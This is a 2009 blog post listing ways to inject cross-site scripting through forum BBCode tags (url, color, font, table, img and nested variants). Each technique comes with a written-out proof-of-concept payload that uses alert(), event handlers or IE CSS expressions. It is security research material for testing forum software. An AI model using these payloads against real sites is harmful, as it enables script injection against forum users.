Thursday, 17 September 2009 20:54

I figured I'd do a little blog posting about finding and exploiting XSS vulnerabilities in BBCode implementations. Not many sources exist for this type of information, and certainly none exist that I am aware of that are as comprehensive.

I've been in contact with RSnake from ha.ckers.org about possibly adding a section to his infamous XSS Cheat Sheet concerning this, and he has responded favorably. Unfortunately, nothing has yet come of this, so I figured I would go ahead and write something up here. A lot of this comes from exploits I have personally found, and most can be found scattered throughout this site.

Most forums allow a user to preview their submissions before posting. This is a good place to test for injections before haphazardly injecting codes!

So, without further ado, here is the list. Feel free to submit any additions below.

  • URL Tag Injection

    The [url] tag can sometimes be injected with XSS, although this will always require a user to click on the link:

    [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
  • Color Tag Injection

    The [color] tag can sometimes be injected with arbitrary CSS styles, and on Internet Explorer versions 7 and before, scripts can be executed with the use of the IE proprietary 'expression':

    [color=#ff0000;font-size:100px;]XSS[/color]

    If this tag results in a rather large, red "XSS" then the BBCode allows for CSS styles to be injected. Internet Explorer 7 or less can thus be exploited by using the 'expression' extension:

    [color=#ff0000;xss:expression(alert(String.fromCharCode(88,83,83)));]XSS[/color]
  • Font Tag Injection

    The [font] tag, like the [color] tag, can sometimes be injected with arbitrary CSS styles as well:

    [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]

    If this tag results in a red "XSS" then the BBCode allows for CSS styles to be injected.

  • Table Tag Injection

    Some BBCode implementations allow user to construct tables, and sometimes allow for arbitrary html tag parameters.

    [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onmouseover='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]

    Unfortunately, this requires a bit of interaction (unless you are injecting CSS styles like the above, in which case you'll most likely be restricted to IE <= 7).

  • Nested URL Tag Injection

    A lot of times, various BBCode implementations choke security-wise due to malformed BBCode. By nesting BBCode tags it is sometimes possible to "break out" of the predefined tags.

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]

    This example comes from an exploit I found in the Joomla component Joo!BB.

  • IMG Tag Injection

    Every once in a while, the [img] tag will allow for the addition of arbitrary html tag parameters. On any other element, this would generally require at least some form of user interaction (mouse over, click, etc.), but the img tag has a special parameter: onerror. This allows you to execute scripts if the image does not load. By providing a link to a known non-existent image, it is possible to execute arbitrary JavaScript:

    [img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
  • Nested IMG Tag Injection

    This is basically the IMG Tag injection above with a twist: using nested tags to achieve the injection. This is based off the vulnerability found by Julian A. Rodriguez affecting Phorum.

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
Last Updated on Thursday, 17 September 2009 21:52
 
Comments (2)
1 Thursday, 15 July 2010 20:57
asdf88884
does this have a bbcode injection?
2 Monday, 12 December 2011 07:38
rNr
Very nice!

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions